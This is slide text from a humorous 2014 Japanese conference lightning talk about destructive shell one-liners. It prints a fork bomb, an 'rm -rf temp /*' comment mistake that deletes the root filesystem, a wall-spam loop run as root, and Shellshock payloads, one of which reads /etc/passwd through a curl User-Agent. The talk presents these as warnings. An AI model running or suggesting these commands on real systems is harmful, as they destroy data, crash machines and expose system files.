20141019 OSC Tokyo/Fall LT 【危険シェル芸】
- 5. 危険シェル芸とは
• マウスも使わず、ソースコードも残さず、
GUIツールを立ち上げる間もなく、
あらゆる破壊・迷惑・自滅行為を
CLI端末へのコマンド入力一撃で終わらすこと。
http://blog.ueda.asia/?page_id=3752
2014/10/19 OSC Tokyo/Fall 2014 5
- 7. 戦果(?)
• 初日だけで見知らぬ方のマシン3台轟沈
• その他自爆者多数
• Docker上で試したらホストマシン沈黙の報告
• 自分の本がサイト経由で1冊だけ売れた
• フォロワーが1人減った
2014/10/19 OSC Tokyo/Fall 2014 7
- 11. :(){: | : &};:
• いわゆるフォーク爆弾
• 関数「:」のプロセスがマシンに溢れて再起不能
• Docker越しにホストを葬る殺傷力
つまり一言で言うと・・・
2014/10/19 OSC Tokyo/Fall 2014 11
- 13. ふたつめ
• シェルスクリプトにて
rm -rf temp /* テンポラリを削除*/
出典: @moguno さんより
2014/10/19 OSC Tokyo/Fall 2014 13
- 14. rm -rf temp /* テンポラリを削除*/
• 消えるのはtempと/*
• シェルスクリプトのコメントアウトは#
覚えておきたいのは・・・
2014/10/19 OSC Tokyo/Fall 2014 14
- 16. みっつめ
# for x in `seq 1 10000`;
do wall '我はroot。神だ' ; done
出典: @ryoana14 さんより
2014/10/19 OSC Tokyo/Fall 2014 16
- 17. # for x in `seq 1 10000`;
do wall '我はroot。神だ' ; done
• 誰も端末使えないぞ!
• すごいポンポン言う!
即ち・・・
2014/10/19 OSC Tokyo/Fall 2014 17
- 22. $ env x='() { :;}; echo vulnerable' bash -c
"echo this is a test"
2014/10/19 OSC Tokyo/Fall 2014 22
- 25. $ curl -A '() { :; }; /bin/cat /etc/passwd |
/usr/bin/tail -n 3'
http://localhost/index.php
2014/10/19 OSC Tokyo/Fall 2014 25
- 33. 結論
• 危険シェル芸は危険
• Shellshockは危険
• 人生は危険
• 安全な方が精神的・肉体的によい
– 「世界は危険に飢えている」なんて言って
ごめんなさいごめんなさいごめんなさい
ごめんなさいごぬんなさい!
2014/10/19 OSC Tokyo/Fall 2014 33
